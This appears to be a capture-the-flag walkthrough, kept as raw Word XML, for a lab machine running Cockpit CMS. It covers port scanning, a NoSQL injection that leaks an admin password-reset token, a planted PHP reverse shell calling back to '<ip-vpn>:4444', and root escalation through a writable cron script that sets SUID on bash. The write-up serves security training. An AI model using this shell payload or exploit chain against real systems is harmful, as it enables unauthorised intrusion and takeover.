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COCKPIT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4mkdjdtc1dge"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determine the running services and identify accessible ports. To accomplish this task, we will use Nmap, a tool specialized in network mapping and service analysis.</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27300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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completing the scan, we identified two open web ports: 80 and 8080. Now, we will focus our attention on the web service running on port 80.</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98800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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analysis, we determined that it is a completely static page, just an HTML template. Now, we will proceed to inspect the web service running on port 8080.</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65500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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the application through port 8080, we observed that it is Cockpit. Cockpit simplifies starting containers, managing storage, configuring networks, and inspecting logs, among other functions.</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attempting some default credentials without success, we conducted vulnerability research and found a website explaining how to exploit a NoSQL injection (NoSQLi) vulnerability.</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hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://swarm.ptsecurity.com/rce-cockpit-cms/</w:t>
        </w:r>
      </w:hyperlink>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40100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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According to the previously mentioned site, we will intercept the login request using Burp Suite to extract the username and password reset tokens.</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89300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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passing the PHP function </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">var_dump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as an argument, we convert blind injection into classic in-band injection. With a single query, we can retrieve the names of all application users.</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97100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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this scenario, we observe that there is only one user: "admin". Now, we will send a request to extract the token required to reset this user’s password.</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92300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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possession of the token, we are able to reset the password of the "admin" user.</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54200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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access the application using the new password we defined.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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65500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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01900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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authenticating into the application, we can navigate to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/finder</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and create a file named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing our reverse shell payload.</w:t>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79700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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creating the file, we can edit it to include our reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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3365500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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2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 system("/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1'"); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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0" l="0" r="0" t="0"/>
            <wp:docPr id="6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8">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714500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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simply need to access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/shell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to obtain the shell.</w:t>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54200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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18542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And we have shell access:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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62100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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the simple shell to fully interactive TTY:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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2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1524000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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root directory, we can retrieve the first flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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71600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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our first user flag, it is time to escalate privileges to obtain our final flag. For this, we must escalate to the root user.</w:t>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the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory, we observe a directory named "cockpit". Inside this directory, we find the file</w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> cockpit.backup.sh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is a bash script designed to remove files and directories from the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/shm</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path.</w:t>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 important observation is that we have write permissions on this file. Everything suggests that it is a cron job associated with the root user. To confirm that it is indeed a cron job, we can edit the file and add a command to create a file in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/shm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory. If the file is created, this confirms that it is a cron job.</w:t>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60600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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46200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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 few minutes, we have confirmation.</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20800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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edit the file again, but this time we will grant SUID permissions to the bash binary. This will allow us to obtain a shell with root privileges to retrieve our final flag.</w:t>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63700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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the scheduled task executes, the bash binary now has SUID permissions. We can then execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that the bash binary runs with the permissions of its owner, which is root. Now, we simply access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directory to retrieve the final flag.</w:t>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65300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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headerReference r:id="rId33" w:type="default"/>
      <w:headerReference r:id="rId34" w:type="first"/>
      <w:headerReference r:id="rId35" w:type="even"/>
      <w:footerReference r:id="rId36" w:type="default"/>
      <w:footerReference r:id="rId37" w:type="first"/>
      <w:footerReference r:id="rId38"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4">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="5"/>
    <w:bookmarkEnd w:id="5"/>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6" name="image20.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image20.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5">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46">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6.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8" name="image11.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1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Cockpit</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6.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image26.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6.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24.png"/><Relationship Id="rId21"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25.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cockpit.backup.sh"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8.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://swarm.ptsecurity.com/rce-cockpit-cms/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.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0.jpg"/><Relationship Id="rId2"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2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bLkPLyN25LGsrJdlQMMx+9MLSw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjRta2RqZHRjMWRnZTIOaC4xNzVmNWNzOTR6MG84AHIhMVMtT2MtYU9sWnFYa2o4cHV6S1kxOTRwaERjTXM0ckZT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